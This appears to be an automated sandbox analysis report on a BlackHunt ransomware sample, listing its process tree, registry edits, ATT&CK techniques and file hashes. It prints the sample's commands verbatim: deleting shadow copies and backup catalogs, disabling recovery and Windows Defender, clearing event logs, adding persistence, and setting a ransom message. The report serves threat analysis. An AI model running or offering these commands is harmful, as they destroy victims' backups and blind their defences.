063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 132 PID 2296 wrote to memory of 2620 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 130 PID 2296 wrote to memory of 2620 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 130 PID 2296 wrote to memory of 2620 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 130 PID 2296 wrote to memory of 2620 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 130 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe"C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2296 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe" /F2⤵PID:2012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1884
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2812
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3760
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3452
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4020
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3924
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3744
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2244
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3920
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1152
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4044
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2004
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3876
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3896
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3940
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3800
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4016
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3468
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3928
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4012
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3932
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:772
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:488
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3456
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe"2⤵
- Deletes itself
PID:2516 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3152
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2216
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2420
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:1440
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:1532
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2708
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2952
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:1240
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1904
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2680
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2888
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2468
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:772
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:680
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2916
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2512
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe" /F1⤵
- Creates scheduled task(s)
PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:1560
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2056
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2428
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:612
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1184
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:1240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2224
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1532
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2072
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-161824481564459639-244510518643684444591306986137881261707297346-482015690"1⤵PID:1440
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2020245571-20418731791124575916-551970865-1432683280-649697805-10697653761558126603"1⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2880
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "84324004119979558981335460492351625224470043041509642558-14250739511663519517"1⤵PID:2468
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5d777c3a81a778a24f39ed2a8fb12f8f2
SHA1856d90d57f4cf8aec82a039deef88f0158ef9564
SHA256cba79f434e24cc2735ad0cf4772598a38c6372ecd9914719897f99a578b13d09
SHA512092390e213783b1d99a96da7e0eec4f6d4dc8a7c2318ffd3a37edf94f5940769ad349052174639455176c8c865e1c6851d18635ffb9b15b93846a7dffa482c75
-
Filesize
1KB
MD56eae424dc77bfb06ce3e4f6ee674ae00
SHA199cfff8376f10a7d29ceb816638bfcf123473bb5
SHA256297787791c1dc28535cbdba94e3c292233372104ddc161617492ec921917f60f
SHA51222b860068ed0c6cdd6a31c7283deaabafd18a1071aaf5a9feb90d39c0e8bd5e78080c7370b8af329eef8b98758962fd9545417cdc768707d9f336f296f28d5ff
-
Filesize
684B
MD59ed8fdbaba928000a3da0daff26374b3
SHA14270d238075e973d5c9bb7891a24b379bf778481
SHA256dc4016155a41dc51751e0dd8d850960ff0a93f59d0948e2c5816f4880240d87f
SHA512bee0e2c53f7695a503107fb03ce81641c766ecd6565c76d466e5f61eebd40cc9dd67b55cf3bfa59668ec8db07b55452be782c06c5d2e7052dc6d32e620bf5f3a